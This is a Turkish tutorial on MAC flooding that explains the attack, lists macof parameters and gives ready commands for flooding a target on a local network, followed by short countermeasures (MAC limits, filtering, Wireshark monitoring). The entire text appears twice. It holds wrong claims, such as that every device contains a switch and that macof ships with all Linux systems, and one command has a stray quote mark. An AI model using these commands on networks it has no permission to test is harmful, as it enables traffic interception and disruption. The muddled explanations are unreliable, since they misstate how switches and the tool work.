Mac Flooding Saldırsı Nedir?
Mac Flooding saldırısı, saldırganın local ağ üzerinden hedef cihaza sahte mac adresleri yollayarak ağı dinlemeye hedeflemektedir. Bu saldırıya uğrayanların en büyük belirtisi ağ hızının çok yavaşlaması belirti olarak gösterebilir.
Bu saldırıyı anlamak için biraz detaya girelim.
Her cihazda swicth (anahtarlayıcı) mevcuttur. Swicth'in görevi kendisine gelen ağ paketlerini cihaza göndermektir. Böylece cihazda ki ağ trafiği sorunsuz bir şekilde çalışmaya devam etmektedir.
Her swicth'in bir mac adres tablosu (deposu) vardır. Bu dolduğunda ağ trafiği yavaşlayacaktır.
Mac Flood Saldırsı sonrasından ağ trafiğinde swicth yerini hub'a bırakır. Hub swicth'e göre daha yavaş çalışma işlevinde olduğu için ağ trafiği yavaşlayacak ve ağ hızının düşüşüne sebep olacaktır.
Mac Flooding Saldırsı Nasıl Yapılır?
Şimdi bu saldırıyı bir de biz yapalım.
Kullanacağımız aracın ismi Macof'tur.
Kod:
macof
Bu komut ile saldırı için ilk adımımızı atıyoruz. Macof tüm Linux'larda mevcuttur. Bu yüzden herhangi bir yükleme yapmamıza gerek yok.
Kod:
macof -h
Bu komut ile macof'un hangi parametreler ile neler yapacağımızı öğreniyoruz. Macof'un parametreleri şunlardır,
macof -i interface= Gönderilecek arabirimi belirtin
macof -s src = Kaynak IP adresini belirtin.
macof -d dst = Hedef IP adresini belirtin.
macof -e tha = Hedef cihazın adresini belirtin.
macof -x sport = TCP kaynak bağlantı noktasını belirtin
macof -y dport = TCP hedef bağlantı noktasını belirtin
macof -n times = Gönderilecek paket sayısını belirtin.
Biz basit bir saldırı yapıcağımızı için şu komutu yazıyoruz.
Kod:
macof -i eth0 -n 10 "
Hedef adrese saldırmak için şu komutu giriyoruz.
Kod:
macof -i eth0 -n 10 -d 000.000.00.000 (hedef Ip adresini yazıyoruz)
Bu komut ile saldırımızı gerçekleştirmiş oluyoruz.
Bu Saldırılara Karşı Alabiliceğiniz Önlemler
Swicth'i (anahtar) ayarlayarak bağlanacak Mac adreslerini sınırlı bir sayıya indirerek bu saldırıya karşı bir önlem alabilirsiniz.
Mac adresini filtreleyerek belirli sayıda Mac adresinin bağlanmasını izin verebilirsiniz.
Ağınızı her zaman wireshark programı ile takip edebilir ve böylece saldırının gerçekleştiği anda durumu fark edebilirsiniz.
Mac Flooding saldırısı, saldırganın local ağ üzerinden hedef cihaza sahte mac adresleri yollayarak ağı dinlemeye hedeflemektedir. Bu saldırıya uğrayanların en büyük belirtisi ağ hızının çok yavaşlaması belirti olarak gösterebilir.
Bu saldırıyı anlamak için biraz detaya girelim.
Her cihazda swicth (anahtarlayıcı) mevcuttur. Swicth'in görevi kendisine gelen ağ paketlerini cihaza göndermektir. Böylece cihazda ki ağ trafiği sorunsuz bir şekilde çalışmaya devam etmektedir.
Her swicth'in bir mac adres tablosu (deposu) vardır. Bu dolduğunda ağ trafiği yavaşlayacaktır.
Mac Flood Saldırsı sonrasından ağ trafiğinde swicth yerini hub'a bırakır. Hub swicth'e göre daha yavaş çalışma işlevinde olduğu için ağ trafiği yavaşlayacak ve ağ hızının düşüşüne sebep olacaktır.
Mac Flooding Saldırsı Nasıl Yapılır?
Şimdi bu saldırıyı bir de biz yapalım.
Kullanacağımız aracın ismi Macof'tur.
Kod:
macof
Bu komut ile saldırı için ilk adımımızı atıyoruz. Macof tüm Linux'larda mevcuttur. Bu yüzden herhangi bir yükleme yapmamıza gerek yok.
Kod:
macof -h
Bu komut ile macof'un hangi parametreler ile neler yapacağımızı öğreniyoruz. Macof'un parametreleri şunlardır,
macof -i interface= Gönderilecek arabirimi belirtin
macof -s src = Kaynak IP adresini belirtin.
macof -d dst = Hedef IP adresini belirtin.
macof -e tha = Hedef cihazın adresini belirtin.
macof -x sport = TCP kaynak bağlantı noktasını belirtin
macof -y dport = TCP hedef bağlantı noktasını belirtin
macof -n times = Gönderilecek paket sayısını belirtin.
Biz basit bir saldırı yapıcağımızı için şu komutu yazıyoruz.
Kod:
macof -i eth0 -n 10 "
Hedef adrese saldırmak için şu komutu giriyoruz.
Kod:
macof -i eth0 -n 10 -d 000.000.00.000 (hedef Ip adresini yazıyoruz)
Bu komut ile saldırımızı gerçekleştirmiş oluyoruz.
Bu Saldırılara Karşı Alabiliceğiniz Önlemler
Swicth'i (anahtar) ayarlayarak bağlanacak Mac adreslerini sınırlı bir sayıya indirerek bu saldırıya karşı bir önlem alabilirsiniz.
Mac adresini filtreleyerek belirli sayıda Mac adresinin bağlanmasını izin verebilirsiniz.
Ağınızı her zaman wireshark programı ile takip edebilir ve böylece saldırının gerçekleştiği anda durumu fark edebilirsiniz.